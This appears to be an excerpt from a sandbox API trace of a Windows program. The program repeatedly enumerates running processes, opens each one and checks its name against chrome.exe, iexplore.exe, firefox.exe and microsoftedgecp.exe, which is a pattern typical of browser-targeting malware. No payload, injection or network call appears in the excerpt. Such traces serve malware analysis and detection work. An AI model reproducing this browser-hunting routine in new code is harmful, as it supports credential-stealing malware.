	[0240.548] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.548] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.549] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0240.549] CloseHandle (hObject=0x4fd0) returned 1
	[0240.549] Sleep (dwMilliseconds=0x64) 
	[0240.647] GetCurrentProcessId () returned 0x110
	[0240.647] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0240.652] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0240.654] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0240.656] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0240.657] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8334
	[0240.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.658] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0240.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.658] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.658] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0240.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.659] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.659] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0240.659] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x8338
	[0240.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.660] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0240.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.660] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.660] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0240.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.661] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.661] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0240.662] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x833c
	[0240.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.662] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0240.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.662] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.663] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0240.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.663] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.663] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0240.664] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x8340
	[0240.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.664] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0240.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.665] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.665] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0240.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.665] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.665] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0240.666] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8344
	[0240.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.666] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0240.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.667] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.667] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0240.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.667] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.668] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0240.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x8348
	[0240.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.669] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0240.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.670] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.670] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0240.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.670] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.671] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0240.671] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x834c
	[0240.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.671] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0240.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.672] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.672] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0240.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.672] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.673] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0240.673] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x8350
	[0240.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.674] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0240.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.674] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.674] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0240.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.674] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.675] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x8354
	[0240.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.675] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.676] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.676] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.676] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.677] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x8358
	[0240.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.678] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.678] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.678] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.679] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.679] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x835c
	[0240.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.680] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.680] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.681] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.681] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.681] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8360
	[0240.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.682] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.683] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.683] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.683] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.683] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8364
	[0240.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.684] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.685] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.685] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.685] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.686] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8368
	[0240.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.687] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.687] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.687] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.688] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.688] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.689] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x836c
	[0240.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.689] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.689] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.689] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.690] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.690] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0240.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8370
	[0240.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.691] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0240.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.691] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.692] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0240.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.692] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.692] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.693] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x8374
	[0240.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.693] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.694] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.694] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.695] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.695] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0240.695] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8378
	[0240.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.696] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.696] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.696] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.697] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.697] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0240.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x837c
	[0240.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.698] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0240.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.698] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.699] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0240.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.699] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.699] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8380
	[0240.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.700] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.700] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.701] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.701] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.701] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0240.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x8384
	[0240.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.702] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0240.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.703] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.703] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0240.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.703] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.704] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0240.704] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8388
	[0240.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.705] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0240.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.705] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.705] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0240.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.706] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.706] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0240.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x838c
	[0240.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.707] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0240.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.707] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.707] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0240.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.707] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.708] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0240.709] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x8390
	[0240.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.709] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0240.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
